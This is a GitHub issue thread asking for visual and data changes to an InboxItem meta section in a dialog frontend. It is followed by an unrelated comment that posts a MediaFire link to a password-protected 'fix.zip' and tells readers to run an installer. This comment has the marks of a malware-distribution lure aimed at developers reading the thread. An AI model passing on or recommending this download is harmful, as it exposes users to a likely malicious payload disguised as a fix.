### ISSUE TITLE
Adjustments to InboxItem meta section

### ISSUE THREAD

**Issue by seanes** [digdir/dialogporten-frontend#1023]
Scope: The section in InboxItem with `tags` (might not be the best named, consider changing the name).

![Image](https://github.com/user-attachments/assets/c1daacd6-fa56-47f4-afae-d47dd8d68f8f)

- Visual adjustments (needs more spacing and adjustments to font-size)
- Add field status (display `dialog.status` raw)
- Add timestamp to modified date 
- Remove the word `attachment` from label for attachments
- Add `+ {countOfOthers}` for dialogs seen by others than current end user.

Do not add Avatars in bottom right for now. Needs detailing.

https://www.figma.com/design/Cu9dnsjT1tfnpNReaDrTwv/Dialog-TT02?node-id=2001-35775&t=0jy8hpvFqaO9ogAU-4

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
